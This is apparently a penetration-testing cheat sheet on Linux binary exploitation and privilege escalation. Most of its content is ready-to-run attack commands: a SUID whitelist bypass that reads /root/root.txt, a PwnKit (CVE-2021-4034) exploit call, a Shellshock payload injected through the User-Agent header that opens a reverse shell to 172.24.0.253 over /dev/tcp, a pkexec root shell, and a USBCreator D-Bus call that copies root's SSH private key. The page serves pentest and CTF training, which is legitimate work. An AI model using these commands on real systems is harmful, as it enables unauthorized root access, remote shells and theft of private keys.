Binary Exploitation - Linux

Binary Basic Enumeration

Display Binary data

cat example | hexdump -C

trace library function calls made by a binary

ltrace [options] <program> [program arguments]

BypassSUIDwhitelist

Sometimes SUID commands may have a whitelist for commands .

This can be bypassed by using subcommands:

supershell ‘/bin/ls $(cat /root/root.txt)’

In this example supershell is the SUID binary and /bin/ls the whitelisted command, there are also another way to bypass this by using ' to open a quote:

supershell ‘/bin/ls

Then in the next line use your desired command:

cat /root/root.txt’

Exploitpkexec

Check if pkexec has SUID permissions:

ls -l /usr/bin/pkexec

Use pwnkit:

python CVE-2021-4034.py

ShellSock

Attack vectors include remote command execution via CGI scripts or web servers, as well as exploitation in environments like SSH, HTTP, and any process that involves Bash interpreting environment variables.

Affects Bash versions 1.x to 4.3:

() { :;}; echo; /usr/bin/id

Inject malicious code through the User-Agent header, targeting a vulnerable CGI script in the /cgi-bin/ directory to initiate a reverse shell:

wget -U '() { :;}; echo; /bin/bash >& /dev/tcp/172.24.0.253/4443 0>&1' -O- http://172.24.0.2/cgi-bin/stats

Pwntools

Attach GDB to a process automatically

p = process('./garbage')
gdb.attach(p)

Polkit

Check policy

cat /etc/polkit-1/localauthority.conf.d

Become root

pkexec "/bin/sh"

USBCreator

Allows to over write files with sudo permissions:

Copy root private key

gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/id_rsa true

PreviousJailbreaks NextKernel Exploits

Last updated 1 month ago